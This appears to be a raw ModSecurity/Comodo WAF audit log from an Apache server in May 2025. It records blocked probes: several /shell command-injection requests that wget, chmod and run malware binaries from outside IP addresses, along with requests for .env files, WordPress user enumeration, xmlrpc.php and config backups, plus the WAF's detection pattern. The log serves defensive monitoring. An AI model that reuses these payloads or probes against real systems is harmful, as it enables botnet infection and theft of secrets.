/shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --0840bf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0840bf67-E-- --0840bf67-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746530795458784 2737 (- - -) Stopwatch2: 1746530795458784 2737; combined=826, p1=493, p2=295, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0840bf67-Z-- --ec3dff04-A-- [06/May/2025:19:34:18 +0700] aBoBynQ-FFoo6luwbxLzHgAAAMA 103.236.140.4 32958 103.236.140.4 8181 --ec3dff04-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --ec3dff04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec3dff04-E-- --ec3dff04-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746534858504125 14542 (- - -) Stopwatch2: 1746534858504125 14542; combined=24878, p1=492, p2=268, p3=0, p4=0, p5=12074, sr=81, sw=0, l=0, gc=12044 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec3dff04-Z-- --71a0286c-A-- [06/May/2025:19:44:03 +0700] aBoEE1odKr7jV1iEMs8VIgAAAIk 103.236.140.4 33028 103.236.140.4 8181 --71a0286c-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --71a0286c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a0286c-E-- --71a0286c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746535443509607 2501 (- - -) Stopwatch2: 1746535443509607 2501; combined=763, p1=478, p2=252, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a0286c-Z-- --80a52431-A-- [06/May/2025:19:49:52 +0700] aBoFcFodKr7jV1iEMs8VIwAAAIo 103.236.140.4 33042 103.236.140.4 8181 --80a52431-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --80a52431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a52431-E-- --80a52431-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746535792981402 2446 (- - -) Stopwatch2: 1746535792981402 2446; combined=826, p1=470, p2=324, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a52431-Z-- --3399eb6b-A-- [06/May/2025:20:03:05 +0700] aBoIib8Q_AFo5EvzOKvbIwAAAEU 103.236.140.4 35308 103.236.140.4 8181 --3399eb6b-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --3399eb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3399eb6b-E-- --3399eb6b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746536585948055 14512 (- - -) Stopwatch2: 1746536585948055 14512; combined=25529, p1=504, p2=272, p3=0, p4=0, p5=12391, sr=73, sw=0, l=0, gc=12362 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3399eb6b-Z-- --aa82eb3c-A-- [06/May/2025:20:06:36 +0700] aBoJXL5Kt25brCRGiyhsygAAABY 103.236.140.4 35908 103.236.140.4 8181 --aa82eb3c-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --aa82eb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa82eb3c-E-- --aa82eb3c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746536796361326 2161 (- - -) Stopwatch2: 1746536796361326 2161; combined=757, p1=463, p2=263, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa82eb3c-Z-- --fbe33940-A-- [06/May/2025:20:50:33 +0700] aBoTqXQ-FFoo6luwbxL0rAAAAM4 103.236.140.4 36366 103.236.140.4 8181 --fbe33940-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.99.210.137 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fbe33940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbe33940-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746539433376774 826 (- - -) Stopwatch2: 1746539433376774 826; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbe33940-Z-- --75e58d18-A-- [06/May/2025:22:09:04 +0700] aBomEL5Kt25brCRGiyh0CgAAAAQ 103.236.140.4 59310 103.236.140.4 8181 --75e58d18-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 139.59.136.184 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --75e58d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75e58d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746544144607124 784 (- - -) Stopwatch2: 1746544144607124 784; combined=324, p1=287, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75e58d18-Z-- --cccd0466-A-- [06/May/2025:22:31:11 +0700] aBorP1odKr7jV1iEMs8dVwAAAJA 103.236.140.4 40376 103.236.140.4 8181 --cccd0466-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.112.162 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cccd0466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cccd0466-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746545471847730 826 (- - -) Stopwatch2: 1746545471847730 826; combined=365, p1=288, p2=0, p3=0, p4=0, p5=77, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cccd0466-Z-- --c22f8c16-A-- [06/May/2025:22:36:28 +0700] aBosfFodKr7jV1iEMs8dsAAAAIQ 103.236.140.4 42492 103.236.140.4 8181 --c22f8c16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c22f8c16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c22f8c16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746545788568473 3016 (- - -) Stopwatch2: 1746545788568473 3016; combined=1381, p1=449, p2=900, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c22f8c16-Z-- --c54d963d-A-- [06/May/2025:22:36:31 +0700] aBosf1odKr7jV1iEMs8dsgAAAIc 103.236.140.4 42510 103.236.140.4 8181 --c54d963d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c54d963d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c54d963d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746545791043040 3101 (- - -) Stopwatch2: 1746545791043040 3101; combined=1481, p1=469, p2=975, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c54d963d-Z-- --6f500c5c-A-- [06/May/2025:22:36:33 +0700] aBosgVodKr7jV1iEMs8dtAAAAIg 103.236.140.4 42514 103.236.140.4 8181 --6f500c5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6f500c5c-C-- demo.sayHello --6f500c5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f500c5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746545793451192 5165 (- - -) Stopwatch2: 1746545793451192 5165; combined=3922, p1=503, p2=3188, p3=26, p4=25, p5=103, sr=112, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f500c5c-Z-- --16c17061-A-- [06/May/2025:22:36:47 +0700] aBosj1odKr7jV1iEMs8dyAAAAJQ 103.236.140.4 42612 103.236.140.4 8181 --16c17061-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16c17061-C-- demo.sayHello --16c17061-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16c17061-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746545807270820 6421 (- - -) Stopwatch2: 1746545807270820 6421; combined=4656, p1=615, p2=3791, p3=31, p4=42, p5=104, sr=91, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16c17061-Z-- --156e1f61-A-- [06/May/2025:23:04:07 +0700] aBoy93Q-FFoo6luwbxIAZwAAANU 103.236.140.4 53078 103.236.140.4 8181 --156e1f61-B-- GET /wp-config.php-orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.110.107 X-Forwarded-Host: 